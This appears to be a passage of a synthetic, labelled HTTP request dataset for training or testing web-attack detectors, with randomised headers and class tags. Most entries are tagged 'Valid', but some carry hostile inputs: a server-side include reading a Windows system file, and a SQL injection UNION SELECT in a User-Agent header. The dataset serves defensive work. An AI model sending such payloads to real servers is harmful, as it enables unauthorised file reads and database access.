MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: datl 7ziWgict=Jnpued
Authorization: Basic ekRpYTpuaGNwY3J4cw==
Range: -687,0114-940064
Referer: /ssrEoWtr.swf
TE: chunked
Trailer: Accept-Encoding
User-Agent: N9tIoig (teJFu4w9e; weG.0Fgyx; o6FUIv1Trb)
UA-CPU: StrongARM
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 808x844
Via: 2.7 www.eFgIg.css
Transfer-Encoding: gzip
Upgrade: ufb/8.5, d45i3/7.9
Warning: 717 108.5.228.232 "euhD8Tr" 
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 752812254452033186
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

aun=93208156&itgtmqtt=<!--#include   virtual="c:\winnt\system.ini"   -->&v-@lUb-GRpasswdYQ=iposition2 winntadminep3rbp(Eo&swLwdgrmh=lSuTjanfx0&oAdlke=enS&ebyedwenzkno9zw=ums&dEt=tsrwpe&trel5=26196&DFposition3cmdTxM=hreotiw6eoefrisa&ts6eoftne9tgw=16265&ihtatvxehe=eA

End - Id: 40417
Start - Id: 12258
class: Valid
GET /hdIF/ldq6Y/UX/n-2z8eoz/5..O0ygkHmrD/rSnXndfvi27Gb8_7IEc/wJexecI0HBscriptR/z2uTTAJYIpOK8s/c6Ed3UWa85f.cgi?nWhttps8=ea%25oexecsdiva+tthtz%29%5Cp&bt9=a8vegeEjLZ&twxf1c4=2&lE5nssm=1221&cYevalq=ne5aidlw8%7Eqn&Txr9qtwdraew=tsock_streamsan+r%7Eute&ZcDy=gOeneegledi&ahbzdblrh9ht=1218880&weeaan1=XaNrOzefiaw&fftpGxp_=62Hi%40 HTTP/1.0
Host: www.ntuahvuvc.uk
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: slecl2h-6raryi7y;q=0.3, e-opo0, ea-sat;q=0.4, i-nUit
Cache-Control: no-store
Client-ip: 177.239.33.200
Cookie: uGc4wuA2e5iiig=2at:jat;kdeleteIw=aegVeae
Cookie2: $Version="852"
Date: Sun, 19 Jun 05 09:56:45 GMT
ETag: "sTvp_LL_hk9sTtTt3zu"
Expect: iesi9
From: 94rwnbe@rex4tieswe.it
If-Modified-Since: Thu, 21 May 09 11:35:29 CET
If-Unmodified-Since: Mon, 06 Feb 06 03:51:51 GMT
If-Match: "ryrsy0VxIaVQ375KMP8"
If-None-Match: "NhFN7QUJMHCe.wh1ieRy"
If-Range: *
Max-Forwards: 5
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM ZG50dHJ2ZGhhaWF1ZWFiZG5Jd3Bhc2VPb1R3aGNub2VuYXNvRWlkbHJ3Y3NucA==
Authorization: Basic NG1jeG9yOmFzcjNzNGo=
Range: 59-,042414-38,-0351
Referer: http://vsdiee.gov/ayfecsw/3Isueo/umitRtdz/uau1.aspx
TE: chunked;q=0.1,trailers
Trailer: Range
User-Agent: 4mpoIn (rBj9.W7n-; p.MYbRvp; ttnZNX)
UA-CPU: Sparc
UA-Disp: 689,5553,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7901x792
Via: 7.9 www.etde.shtml:10
Transfer-Encoding: deflate
Upgrade: hntira/7.0, aeoa6E/8.6, otiql/5.1, ee4/2.6
Warning: 801 56.160.18.152 "x1hi" "Mon, 01 Dec 08 03:48:59 UTC"
X-Forwarded-For: 93.31.136.215
X-Serial-Number: 8899123917889
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12258
Start - Id: 20351
class: Valid
GET /oalawge6Fixooavtoye/sZXmQGinsert31.png?yOAns8=odfjVfHvxG&yhEiyeo=s1asoBxtftoamts&195soptn5jmZ.N=stfD7ics&nwske=eRmdn+&acceptzL@a79-=015&rLedaS=pr%40xwW&yo8rsaunsSurqm=660&Tok=sf%7CpymolKnin%40eil%5C&bfauhnloeo2ah=eOEB&rvi=sUJ5uDZ2&gi3i=eYl&Hnefaueeydeme=er HTTP/1.1
Host: 63.188.164.96:0
Connection: ithghoo
Accept: */*;q=0.1
Accept-Charset: x-mac-icelandic;q=0.9, big5;q=0.2, utf-8;q=0.9
Accept-Encoding: compress, gzip, compress, deflate;q=0.9
Accept-Language: *
Cache-Control: ylzni=tecAhq
Client-ip: 236.14.44.77
Cookie: eAenpAatY=ero7k &t&
Cookie2: $Version="36"
Date: Tue, 27 Apr 10 09:43:01 UTC
ETag: "hAQF3BPQemyzgwrn"
Expect: 100-continue
From: ikwvhdpm@siorbj.uk
If-Modified-Since: Sat, 28 Jan 06 20:55:57 UTC
If-Unmodified-Since: Mon, 01 Jun 09 06:22:33 CET
If-Match: "WrPTMIni1X0qSb."
If-None-Match: "4E3ktDcZoKmrNM7"
If-Range: *
Max-Forwards: 912
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM Y2ltbGtkZmVlaW5qYXRhYWlkZW9haDVvaXNsdGR3bHFMYnQ3
Authorization: seao 2l6eqme=phJoupt
Range: -6349,-64
Referer: http://9ndr.com/MEoooil.bin
TE: trailers
Trailer: Accept-Encoding
User-Agent: gnd2mj
UA-CPU: StrongARM
UA-Disp: 945,093,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 056x355
Via: 9.1 188.241.81.210, 6.4 www.antn1y.jpg
Transfer-Encoding: gzip
Upgrade: sqiew/4.1, 1n55Nn/3.3, aeif/5.3, csk/5.8
Warning: 417 www.fynjteI.jpg "ghs2Gimymbhauoku" "Tue, 02 Oct 07 18:48:29 CET"
X-Forwarded-For: 11.244.14.65
X-Serial-Number: 11331311370992169456
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20351
Start - Id: 30885
class: Valid
GET /mrrD3ta/toT-TM/lxvZNdL7JM/enmeee/nkisnb0lv2towjgei/oi2nhw4nehuecpowY.bin?ohhtt=y-xc_OHR.D&HC4KMCrMkxtermU.=81605&D8Hd1=91533&owaZearou2Soe=50174&lwivFt=928501120 HTTP/1.0
Host: 138.184.108.148
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9, utf-7;q=0.1, windows-874, shift_jis, iso-2022-kr;q=0.7
Accept-Encoding: *
Accept-Language: wndie-w, miEtsEA-cfe7cl, att-E6oo;q=0.0
Cache-Control: no-cache
Client-ip: 64.11.189.106
Cookie: edt1o9git=00458283
Cookie2: $Version="3"
Date: Thu, 02 Apr 09 04:51:31 UTC
ETag: W/"1Ls1B@goh417N@q8mvV"
Expect: 100-continue
From: cltoeaj@urnje.gov
If-Modified-Since: Sat, 30 Dec 06 01:51:09 UTC
If-Unmodified-Since: Fri, 30 Apr 04 22:38:16 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Nov 07 05:45:05 UTC
Max-Forwards: 482
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM dHhucnJzeWE2ek9yczFybmlycm9hZWVlb2E4YjI5T3FjdXZNbjByYWU=
Authorization: tthi eSEuol=suNu
Range: 4-
Referer: http://ulie.de/ljjut.rar
TE: trailers
Trailer: Host
User-Agent: mbHLTZvM http://www.rnBci.st
UA-CPU: MIPS
UA-Disp: 072,6639,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 572x8066
Via: 2.0 175.11.204.178:23, 6.3 www.lsqLhlr.jpg, FTP/0.4 www.irtoa.shtml
Transfer-Encoding: gzip
Upgrade: spiie/8.9, apg2sc/2.7, exuI/4.7, ndd/9.7, fnvse/6.9
Warning: 189 www.mlol.css "aohnMtaeseT4szte" 
X-Forwarded-For: 203.84.246.133
X-Serial-Number: 0719551808086
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30885
Start - Id: 11230
class: Valid
GET /xbBN5K.5l.shtml? HTTP/1.1
Host: www.1hser1g6ri.net
Connection: 3osoe6
Accept: application/rtf;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 27.190.186.97
Cookie: 3WmlognsOT=61237
Cookie2: $Version="68"
Date: Sun, 20 Nov 05 04:32:57 UTC
ETag: "TE11mvbXzB-pOhLld"
Expect: noaleov=h01o
From: aarli@mLmeltu.be
If-Modified-Since: Sun, 26 Oct 08 24:04:17 GMT
If-Unmodified-Since: Sat, 22 Dec 07 14:44:43 UTC
If-Match: "Sv0QPZFm.svW8BTN7zX"
If-None-Match: *
If-Range: *
Max-Forwards: 4859
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: bAGo Oiw9tsc=oisdaoot
Authorization: Digest uri=/drijyv.jpg
Range: -62895,1183-7810
Referer: /o9nrog9/ieEetews.avi
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/9.1 (X11; U; Linux i386 7.9; he-xd; rv:0.4.2) Gecko/98759999
UA-CPU: 68000
UA-Disp: 7122,239,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 689x7201
Via: 8.6 179.44.210.232, 6.0 www.0lnolsC.tiff
Transfer-Encoding: 1aoIbS
Upgrade: uCt/3.1
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 196.44.53.29
X-Serial-Number: 450563801661696804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 11230
Start - Id: 41214
class: SqlInjection
GET /quw/R1gJ05NUaccess_logH@MmlS/cCHHJ0GiGPSgO/iedetreesemtlnmA/iXkUBmrtB7/scU4.lX-H1OJt6dLoZ7/0.fVvhttp/n0d2mKboot.inij7/h2Mv/n2tSielrd3mFTtc/lEad/y45.cgi? HTTP/1.1
Host: 150.232.67.19
Connection: ebjyepoc
Accept: video/quicktime;q=0.7, audio/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 107.193.63.164
Cookie: xleEalitrnoon=5106505
Cookie2: $Version="8"
Date: Thu, 28 Feb 08 24:03:38 CET
ETag: "kcg5S6EEaHytpwVyC3N"
Expect: 100-continue
From: ljOoeae@dayLl.cz
If-Modified-Since: Mon, 20 Jul 09 09:07:43 CET
If-Unmodified-Since: Mon, 14 Jan 08 05:06:08 GMT
If-Match: "BwQE4QdLuZ9lnXmOqbe."
If-None-Match: *
If-Range: Thu, 20 Jul 06 16:18:30 GMT
Max-Forwards: 1713
MIME-Version: 5.2
Pragma: curht=vek
Proxy-Authorization: Basic M3RlZWhuYmE6dGlkdWM=
Authorization: prns5s reiAh=juarld
Range: 870-,33722-,80-34
Referer: http://www.npwz9.com/oWurponL/nStttse/tel2t/sfsy.pl
TE: gzip;q=0.7
Trailer: Cache-Control
User-Agent: ' UNION           ALL            SELECT   awriamb5he FROM     e2enalerao    WHERE  ''    = '
UA-CPU: MIPS
UA-Disp: 1760,871,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9140x4441
Via: 3.5 209.225.147.148
Transfer-Encoding: deflate
Upgrade: sdrona/5.0, vtfpom/3.2, guE/8.0
Warning: 096 28.130.214.30:40463 "bwtv1" "Wed, 03 May 06 17:00:25 UTC"
X-Forwarded-For: 253.197.44.195
X-Serial-Number: 9505530425947859
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41214
Start - Id: 16910
class: Valid
GET /osWN@LzWNli./sYfhKMxl5qP/ta5lsryso3drngsfxsir/ssUoitt9nrepkq/8d.css? HTTP/1.1
Host: www.er7f9ttre.st
Connection: close
Accept: application/*;q=0.2, image/*, audio/x-wav;q=0.8
Accept-Charset: *
Accept-Encoding: deflate;q=0.9, identity;q=0.9, compress, compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 254.25.138.231
Cookie: pzCaxsOwWx=404;rrhdrda9erfsmo=ltstyleu;otlsarscnEscs2q=)60 iad5y
Cookie2: $Version="10"
Date: Thu, 03 Dec 09 06:52:27 GMT
ETag: W/"12Ne@V_DU0DcIxV"
Expect: 100-continue
From: lieouw@nat4Ue.st
If-Modified-Since: Fri, 25 Dec 09 17:21:36 GMT
If-Unmodified-Since: Tue, 22 Nov 05 07:11:32 CET
If-Match: "RA1iAKtFDd_WOMO4Ds"
If-None-Match: "16hj8I50rmTziZ_3Z"
If-Range: "7pv_Hs.VhOJp9lEGUn"
Max-Forwards: 57
MIME-Version: 7.6
Pragma: c='setnr'
Proxy-Authorization: Basic MnNzckdkazppYWVhd3JsNQ==
Authorization: eIrf aCo5gdr=nhHiR
Range: -3
Referer: /hWsadte/nahue/reG0s/tetc.asmx
TE: deflate,trailers
Trailer: Accept
User-Agent: 3tyrawr7nx6terh
UA-CPU: StrongARM
UA-Disp: 077,285,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 124x8989
Via: uad/2.7 140.236.54.111, 3.9 48.167.250.93, 2.8 www.x3lShKrr.shtml
Transfer-Encoding: compress
Upgrade: dHed/7.3, olnnat/3.7, o5p/0.1, wnMa/3.1, arrnc/1.6
Warning: 961 www.El3ett.jpg "wosiueayliee1e9dNy8d" 
X-Forwarded-For: 164.142.194.146
X-Serial-Number: 49349501670921026
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 16910
Start - Id: 12558
class: Valid
GET /soxyQ5StMayS/tyG54t2kXd/qqfxb.X0/rrnwzsA/ts9tmna/e8thn/9PVpzcZ/8VnodeF9s4Hua/k@p_M-zZosp6Gnt/lIe5AittVWj3lso/5objectS.cgi?qrh=msQ8eHlDdEc4&Bxh8tTdbgqG=08059&haeoo=487560&r966-njhXcd=Nr&efqaltBuhn=lrui1eydeI&oowhthi=70074&_WloZCRNplibW=iehG HTTP/1.1
Host: www.lN7obeoe.ch
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 157.23.61.107
Cookie: saho4Fte=53;zvd7ni5aeuNtmuD=Jel\hs%nen;tw4sd79SrpmKdsp=gpa\H;ok=ohbhttpaeOoetoe8;rna3l=eK0duvP;hsRyr=dh
Cookie2: $Version="163"
Date: Tue, 05 Aug 08 03:11:24 CET
ETag: W/"rDRCDmR@SF-2@DYoA3_o"
Expect: rsrehz
From: oaii@fHeu.uk
If-Modified-Since: Sun, 03 May 09 17:59:15 GMT
If-Unmodified-Since: Sat, 07 Nov 09 11:45:30 GMT
If-Match: "dikna27Rbzed.IO.PSao"
If-None-Match: "sPrXlGCc9kxOUdOTeeW"
If-Range: Fri, 03 Oct 08 11:05:13 UTC
Max-Forwards: 175
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iCAy"
Authorization: m5noa a0hiofu=onAon
Range: 86503-,-067547,349937-
Referer: http://imde9E.net/unkefu/msng/dfaeel/ttewta/6df3.txt
TE: trailers
Trailer: Via
User-Agent: Mozilla/6.4 (compatible; Konqueror/5.5; SunOS sun4u; a6ir)
UA-CPU: 68000
UA-Disp: 3658,3398,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 366x415
Via: FTP/0.8 217.161.150.156, 9.4 241.228.140.23, FTP/7.4 www.oqchm.gif
Transfer-Encoding: gzip
Upgrade: AGSes/3.1
Warning: 997 www.ce9up3.htm "ertyen49aeinh" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 3472507595174879
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12558
Start - Id: 10919
class: Valid
GET /8KYMOYnull6X7IZ/9izNoexcetjliscgaxpd/Ogt5tExosteehex8s/7TfT/ubumV/dEuh6sB4eLoBwTQ/loS3eFomoilwrb0/a1bi.html? HTTP/1.1
Host: 70.76.156.201
Connection: keep-alive
Accept: audio/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: heajei-wmn, 8S-ins7tr4, ov-38o
Cache-Control: no-cache
Client-ip: 203.138.225.22
Cookie: 4Oi8=dDo1aFX;9drrojt=log9s3ofn>ttalallk
Cookie2: $Version="8"
Date: Tue, 17 Aug 04 02:24:41 CET
ETag: W/"dnw7_jOOBdyI7BZJTd-B"
Expect: 1NlueeoI
From: dmnba@sipo.net
If-Modified-Since: Thu, 19 Nov 09 09:39:02 GMT
If-Unmodified-Since: Tue, 03 Nov 09 13:38:46 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Apr 04 23:10:26 UTC
Max-Forwards: 7
MIME-Version: 0.9
Pragma: ainnt=Ier
Proxy-Authorization: Basic TWFzZ3VyeWg6SU1hZ2Nl
Authorization: NTLM MnpsZWhtaXQ4YXJoeWVvYWRsaWRqbG11bGlvZWU2OG9z
Range: 588592-19738,0954-52796,229852-
Referer: http://wajog.ch/w8IT/um8yE.jpeg
TE: trailers,deflate;q=0.6,trailers
Trailer: Transfer-Encoding
User-Agent: qqncXb http://www.mertnt.org
UA-CPU: PowerPC
UA-Disp: 7000,971,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4811x4751
Via: 9.3 www.votiHsss.png, FTP/8.7 79.223.126.237:3
Transfer-Encoding: identity
Upgrade: xivl/0.5, eLO/6.4
Warning: 236 www.anncO0t.jpg "tlYaoiMnHeoasniuo" 
X-Forwarded-For: 135.5.6.65
X-Serial-Number: 847206508501943209
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10919
Start - Id: 10410
class: Valid
GET /otFpAgg39EH_5oyOs/cpseat4d/r0nsnv9oGixsfao/onws6rfdEj4U4n3mFcoQ/i3teatnohndi/E72DmtBw1Waunion@j/e8NGBXlakZO-VAFZimd/cuH6A3/tKXzE-WobMUn.asmx? HTTP/1.0
Host: 191.0.132.255:213
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=0052
Client-ip: 125.236.129.149
Cookie: Sr=thHHBskW0u;Freplacel1-1E6=4xL~hdirerk%ur?e3ak[;wiOtaee11neaoii=sadsdhtdaOd0tdw;naoeOrecweeg1nn=eg8
Cookie2: $Version="2"
Date: Mon, 05 Nov 07 19:18:18 GMT
ETag: "GfcGhNtO9Dp@cKZXz@J"
Expect: 100-continue
From: orksp@rBr6etaim.de
If-Modified-Since: Mon, 26 Jan 04 06:59:20 GMT
If-Unmodified-Since: Wed, 02 Dec 09 15:28:55 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 05 Jul 08 12:47:50 CET
Max-Forwards: 24
MIME-Version: 2.8
Pragma: y0=e
Proxy-Authorization: 2tht ejer=oT7xhiau
Authorization: NTLM ZXRvZXdzc2VtYTdlbWY4dHBtcnZlT2M1bGZyT2l1dG5yaFNuYXJuZWFBaQ==
Range: 5-355295,61313-1,05930-37268
Referer: /nrsaBif/endaE/thtitati/wtnmg8.png
TE: chunked,trailers,trailers
Trailer: From
User-Agent: Mozilla/3.1 (Machintosh; U; PPC Mac OS X 1.0; ni-re; rv:8.1.3) Gecko/49546263
UA-CPU: StrongARM
UA-Disp: 1729,6694,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 552x911
Via: 3.2 119.115.143.19
Transfer-Encoding: deflate
Upgrade: eso/3.5, ddji/0.2, bfcnj/3.8, ofsuw6/8.7
Warning: 317 www.nwo2aaL.html "hrhexamatrte3elRbtn" 
X-Forwarded-For: 248.234.188.76
X-Serial-Number: 664473
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 10410
Start - Id: 13725
class: Valid
GET /e2/r.RKa6dWXD69b9_Fx/keSksoinUf4yn3w/NinvtrYv/qetarobOaBc4A/stryvQH_zKHE_/iG/em1z7SLnCtZniAe9/znP1wvt.cfm? HTTP/1.0
Host: www.ue5sMafete.uk
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.2, x-mac-chinesetrad;q=0.0, cp-936;q=0.2, windows-1258
Accept-Encoding: 
Accept-Language: strstmoo-w, h-ttehl, I-nul14t;q=0.7
Cache-Control: only-if-cached
Client-ip: 239.103.98.206
Cookie: 8freplace4=:aan ;Igrnoebefac7df=4331344904;i7aaxignrN=27207552;4@AetcHhqMcj3x=a6HuK2BG9;D.imQlogfv0G5=77;.gOpNsTincludehklike-=u  0a
Cookie2: $Version="95"
Date: Mon, 20 Jul 09 09:02:40 UTC
ETag: W/"a_ZfpksVbF0IZ4QA"
Expect: R2ra
From: ep4c@gnrwie6l.biz
If-Modified-Since: Tue, 31 Jul 07 09:29:14 CET
If-Unmodified-Since: Mon, 02 May 05 23:16:58 GMT
If-Match: "caJKCc4O32oT7uwtS"
If-None-Match: "J.Uch77mFnoT2h3"
If-Range: Fri, 22 Apr 05 03:04:25 GMT
Max-Forwards: 8
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://sliaCear.fr/xlh1/4tmg/t5e1.mp3
Authorization: NTLM N2hjblJlZHNtZGxzZHExVnNhc2lqbXJzc2lta3NvYW8wNA==
Range: 946087-
Referer: http://ah9eur.com/anreysN/ethi/M5ee/1aai/eh1a4wIe.js
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.3 (compatible; MSIE 8.9; Unix; nR5ort)
UA-CPU: PowerPC
UA-Disp: 911,125,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6985x6776
Via: 4.9 www.t89mtE.htm
Transfer-Encoding: identity
Upgrade: l4tt/6.1, gtIh/6.6, nsetrs/8.9, h1ehro/2.2
Warning: 465 123.84.85.72 "ierheaeNiutccea" 
X-Forwarded-For: 80.234.107.2
X-Serial-Number: 1852790108043394492
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13725
Start - Id: 28965
class: Valid
GET /eWT/sBr8Y3Kgm9@Rpwq/eauscejr/ytafAo42nsneaTohojp/UObuZS0Bhc1-/.0skW3Stm/Hy0aQD8w/inzz.asmx?4ltoe8f19inen0=o&5ntuic=Ee9iSreaagtio HTTP/1.0
Host: www.eis5fo15bb.uk
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9;q=0.6, cp-950
Accept-Encoding: 
Accept-Language: serha-hia;q=0.9, teola0I-wnw9s, hee-2tphoao;q=0.6, phnwao0-rte;q=0.9, djtal-heI;q=0.1
Cache-Control: no-cache
Client-ip: 78.125.221.48
Cookie: tTmhlnUe3tsSQ=oNi6zeh1tl8
Cookie2: $Version="25"
Date: Mon, 21 Apr 08 24:25:37 UTC
ETag: "AlH_ZvVv78c5KA9P@U"
Expect: rskuty=telqu7e
From: h5hrlh@Esuhia1.cz
If-Modified-Since: Sat, 30 Jul 05 10:52:41 UTC
If-Unmodified-Since: Tue, 07 Aug 07 13:31:31 UTC
If-Match: *
If-None-Match: "DAVrSa_tCv_AzhAYg"
If-Range: Wed, 13 Sep 06 06:47:53 UTC
Max-Forwards: 300
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: praomc eFi7othH=broeRu
Range: -332385,-432,1995-63
Referer: /uiiEah/egcetena/teiaat5i/lixpc/fiilth.pl
TE: gzip;q=0.2,gzip;q=0.9
Trailer: From
User-Agent: Mozilla/6.9 (Windows; U; WinNT 8.4; zt-iC; rv:0.4.1) Gecko/37459900
UA-CPU: Sparc
UA-Disp: 3550,9047,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1053x1221
Via: oeeS/5.9 www.uiloh.gif
Transfer-Encoding: mgwcfg; smosd1o=qA3e
Upgrade: SDtt/0.6, mnhrp/9.3, edgePn/8.1
Warning: 060 221.176.165.132 "oh3respRbbacere" "Fri, 16 Mar 07 05:27:50 UTC"
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 055751373307057
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 28965
Start - Id: 26254
class: Valid
GET /aatqeotnDOoo0to.shtml?0es=eaioornizuug&reSxbuatrs=%28Yr+cep%40ra&w3ZJwindow.openOhB_y=h-6oKxwvJk&.YWFBzQZaODS=047&hlh2scoubd7t=kscriptcrvs HTTP/1.0
Host: 196.174.249.190:370
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, gzip;q=0.1, gzip;q=0.9, gzip, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 70.146.111.185
Cookie: 3amtls0flE8=Ho;s8mfEnir=toMCe2181H;sepB=ensi;st6nwacheTbih=ig6a;ldddz4enz=rs;5utetbgei7=s/iTot
Cookie2: $Version="197"
Date: Sat, 20 Oct 07 15:52:29 GMT
ETag: W/"8LBX1x@chnIqvUTCc"
Expect: igoe3
From: nFledhng@FadgstE.de
If-Modified-Since: Fri, 23 Feb 07 11:49:14 CET
If-Unmodified-Since: Sat, 30 Oct 04 13:17:46 CET
If-Match: *
If-None-Match: "HInUMaouvHwnQOE1m"
If-Range: Wed, 16 Sep 09 11:54:07 UTC
Max-Forwards: 14
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest response="87dB66307E2ef8c477fd16DCFeD9fd69"
Authorization: NTLM YWFscG5lbk1paW5IdXVseHRoc3ljcmx5bTdibDRlaXBrZXJ0T2VwSHVSaGFv
Range: 47781-
Referer: http://i8mhD3.de/jowemz9/laiD/rrieT8ut.doc
TE: trailers,gzip;q=0.6
Trailer: Referer
User-Agent: Mozilla/7.1 (Machintosh; U; Mac OS X 2.6; sm-at; rv:9.5.6) Gecko/36177417
UA-CPU: Sparc
UA-Disp: 9474,169,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 857x6835
Via: 8.8 www.inSbo4.js, dAlezt/5.4 www.yAumergt.tiff
Transfer-Encoding: ysno; EeeRu=gtrn
Upgrade: geoaa/5.5, tnh/2.0, wawlno/4.1
Warning: 523 www.fcafY9.gif "ilbdchn" "Thu, 14 Aug 08 02:13:15 GMT"
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 4037485153
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26254
Start - Id: 1951
class: Valid
GET /fhiahnekd/nYW/t9g@fpDPLfeIrC_-bUyH.asmx?Xx442=o%27nie&eaqeo2o7udaq=t&cet7truRltsye=20395&_DNi8Di=163&iwj7tSaeeeezt=%3Ei%27nu&4h9-MK=pVn2rht8&.yaBexecemwfPOO=p4shutdown&elolo7ah=084564049 HTTP/1.1
Host: www.mcitiftn.net
Connection: close
Accept: */*;q=0.4
Accept-Charset: cp-936, iso-2022-kr;q=0.8, windows-874;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 93.59.198.99
Cookie: iy=%nw;unxrap4rerrtn=ueOn3ol;nioogaraoAgoMd=sU4UrN5Rcro;r8iQrvF08=63726;scriptu3QfMl3_y8=d(mx=]khte)cu;PB-O=&wme
Cookie2: $Version="909"
Date: Wed, 21 Nov 07 17:13:03 CET
ETag: "5IM0a8wAua3B.5K8dP"
Expect: beodarf=Ylw6oeMa
From: eegL@aene5f.biz
If-Modified-Since: Fri, 21 Oct 05 18:04:32 CET
If-Unmodified-Since: Fri, 04 Apr 08 13:20:16 GMT
If-Match: "TE6cKGkRIuc-27@th7"
If-None-Match: "0wu8yiPfoBp.LqLc"
If-Range: "M32ij3MFaylXZPNQpiJ"
Max-Forwards: 5
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="sjnetyi"
Authorization: NTLM SXlhc2JzZG1vbjI5ajJqVGZpRHRzdGl0ZHVhZXl1ZXI=
Range: 0-,-750641
Referer: /3dSu/mbnni.pl
TE: trailers
Trailer: Date
User-Agent: thner6d
UA-CPU: Sparc
UA-Disp: 410,9893,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 0817x8705
Via: 7.6 131.55.188.191:197, yei3nh/4.5 www.Ilren.htm:99987
Transfer-Encoding: biets
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 258 www.6tsT.css:93 "s2qtf" 
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1951
Start - Id: 28975
class: Valid
GET /tuicbFhYnltwy/linebcmptwcag9lmb/lMXBSRi7SwU/ohpuymhljre9hoeR3o/edhgsuieauffS8t3il/mdnn5pexrg9.mdb?nlhtaznd2hodro=90520&v.KibAEeLe=%29hn+a&roe=iEz4BeGld&NpYSgFdropZTSz=0041&dzMK8@z.6insertf=xUrs5&@tcv0POK@P=i.3zXB8KQ HTTP/1.1
Host: 60.216.83.201
Connection: mntuv
Accept: image/*, image/gif, image/png
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.6
Accept-Language: ae-a4, cd2i-honIbl5t;q=0.0, aseytxap-smtts;q=0.6, b0htrEne-l;q=0.9
Cache-Control: no-cache
Client-ip: 15.156.44.232
Cookie: eH5FzJl=8800;3rsiafyaM2legE0=2
Cookie2: $Version="4"
Date: Thu, 03 Feb 05 12:12:12 CET
ETag: "6W6lizwmf3Sl4Tos"
Expect: 100-continue
From: hthNw@xsshl3roat.ch
If-Modified-Since: Thu, 06 Dec 07 24:24:54 CET
If-Unmodified-Since: Sat, 17 Sep 05 09:45:25 GMT
If-Match: "QvzmWSmGDCvuX2ozNG1"
If-None-Match: *
If-Range: Fri, 15 Sep 06 08:28:39 CET
Max-Forwards: 7
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
